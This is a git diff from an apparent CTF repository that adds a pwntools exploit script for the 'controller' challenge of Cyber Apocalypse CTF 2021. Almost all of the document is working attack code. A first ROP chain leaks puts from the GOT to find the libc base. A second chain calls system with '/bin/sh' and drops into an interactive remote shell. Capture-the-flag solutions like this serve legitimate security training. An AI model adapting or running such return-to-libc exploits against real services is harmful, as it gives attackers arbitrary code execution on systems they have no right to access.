Ret2Me
diff --git a/‎CTFs/Cyber Apocalypse CTF 2021/exploit.py‎
Lines changed: 57 additions & 0 deletions b/‎CTFs/Cyber Apocalypse CTF 2021/exploit.py‎
Lines changed: 57 additions & 0 deletions
diff --git a/‎CTFs/Cyber Apocalypse CTF 2021/pwn_controller.zip‎
863 KB b/‎CTFs/Cyber Apocalypse CTF 2021/pwn_controller.zip‎
863 KB
@@ -0,0 +1,57 @@
+#!/usr/bin/python3
+from pwn import *
+from time import *
+import sys
+from struct import pack
+context.terminal = ['bash', '-e', 'sh', '-c']
+
+#                          loading all needed files
+#=========================================================================================+
+binary = ELF('./controller')                          # loading the binary into pwntools  |
+context.binary = binary                               # loading settings                  |
+p = remote(IP, PORT)                                  #                                   |
+#p = process(binary.path)                             #                                   |
+libc = ELF('/usr/lib/x86_64-linux-gnu/libc-2.31.so')  # loading libc                      |
+#=========================================================================================+
+
+p.sendlineafter('Insert the amount of 2 different types of recources: ', '1 -198')
+p.sendlineafter('>', '3')
+log.info("generating payload to leak libc")
+
+#======================= PAYLOAD TO LEAK LIBC ADDR ===========================+
+laPayload  = b'\x79' * 40               # padding                             |
+laPayload += p64(0x00000000004011d3)    # pop rdi; ret                        |
+laPayload += p64(binary.got.puts)       # libc / glibc func addr given by LD  |
+laPayload += p64(binary.plt.puts)       # local puts addr                     |
+laPayload += p64(0x0000000000401066)    # calculator addr                     |
+#=============================================================================+
+
+
+p.sendlineafter('>', laPayload)
+p.recvuntil('reported!\n')
+puts_addr = p.recv(6)
+
+
+libc.address = u64(puts_addr + b'\x00\x00') - libc.sym.puts # calculating libc addr
+log.info("puts: " + hex(u64(puts_addr + b'\x00\x00')))
+log.info("libc: " + hex(libc.address))
+
+p.sendlineafter('\nInsert the amount of 2 different types of recources:', '1 -198')
+p.sendlineafter('>', '3')
+log.info("generating main payload")
+
+
+#======================= MAIN PAYLOAD CALLING "SYSTEM" FUNCTION ========================+
+payload  = b'\x79' * 40                               # padding                         |
+payload += p64(0x00000000004011d4)                    # to keep correct stack alignment |
+payload += p64(0x00000000004011d3)                    # pop rdi; ret                    |
+payload += p64(libc.address + 0x18a156)               # /bin/sh string                  |
+payload += p64(libc.address + 0x48e50)                # system function                 |
+#=======================================================================================+
+
+
+p.sendlineafter('>', payload)
+log.info("payload sent")
+p.recvuntil('reported!\n')
+
+p.interactive() # to continue interacting with user